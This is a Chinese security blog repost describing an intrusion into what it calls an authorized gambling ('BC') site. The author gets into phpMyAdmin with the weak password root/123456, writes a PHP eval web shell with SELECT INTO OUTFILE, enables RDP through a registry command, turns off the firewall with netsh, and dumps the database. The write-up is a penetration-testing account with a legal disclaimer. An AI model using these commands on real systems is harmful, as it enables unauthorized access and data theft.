实战 | 关于一次弱口令的BC渗透

admin 2025年2月13日22:30:44评论16 views字数 934阅读3分6秒阅读模式

某种原因,接手了一个授权的bc站

内心是拒绝的,但是没办法,硬着头皮收下了。

其实都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一个0day就进去了
但像我这种dd,只敢远观。

打开主页,还算清新的画风,比那些打开就这闪那闪花里胡哨的站舒服多了。

实战 | 关于一次弱口令的BC渗透

简单的扫了一下目录,扫出了两个比较有用的的东西就是一个后台,一个探针

实战 | 关于一次弱口令的BC渗透

见到后台,废话不多说,直接弱口令套餐来一份

得到的结果肯定是  密码错误X1   密码错误X2   密码错误X3…………

算了,不浪费时间了,看一下探针~  根据探针,得知网站的根目录

底下有phpmyadmin的连接测试

实战 | 关于一次弱口令的BC渗透

直接弱口令再来一套,root  root    密码错误

Root 123456  密码错  唉   不对  好像是连接成功了

实战 | 关于一次弱口令的BC渗透

激动的留下了眼泪
根据探针,得知phpmyadmin的后台地址

实战 | 关于一次弱口令的BC渗透

Root 123456
登录

实战 | 关于一次弱口令的BC渗透

Phpmyadmin进来了,网站根目录也知道了,那还唠啥了,直接拿shell了

直接执行sql语句

select'<?php @eval($_POST[pass]);?>'intooutfile'D:/xxx/xxx/xxx.php'

实战 | 关于一次弱口令的BC渗透

一句话连接上,

Whoami  system …………  没意思啊,提权都不用了

实战 | 关于一次弱口令的BC渗透

通过查看服务器文件,得知后台登陆密码,登陆后台

实战 | 关于一次弱口令的BC渗透

因为个人喜好,比较喜欢用cs,powshell上线

读了一下密码,直接远程连接

实战 | 关于一次弱口令的BC渗透

但是

实战 | 关于一次弱口令的BC渗透

netstat -an  ,没开3389

实战 | 关于一次弱口令的BC渗透

开启3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

但是连接了一下,还是不行,用nmap扫描了一下端口,只有80端口开放
应该是开着防火墙

netsh firewall set opmode mode=disable  关闭防火墙

实战 | 关于一次弱口令的BC渗透

再连接3389   连接成功

实战 | 关于一次弱口令的BC渗透

根据浏览器历史记录,又发现另一个网站后台

实战 | 关于一次弱口令的BC渗透

到现在其实没啥了,直接数据库打包~完活上交。

作者:T00ls-Azjj98转载自:https://www.t00ls.net/articles-56653.html

 

原文始发于微信公众号(渗透师老A):实战 | 关于一次弱口令的BC渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月13日22:30:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 关于一次弱口令的BC渗透https://cn-sec.com/archives/1061336.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息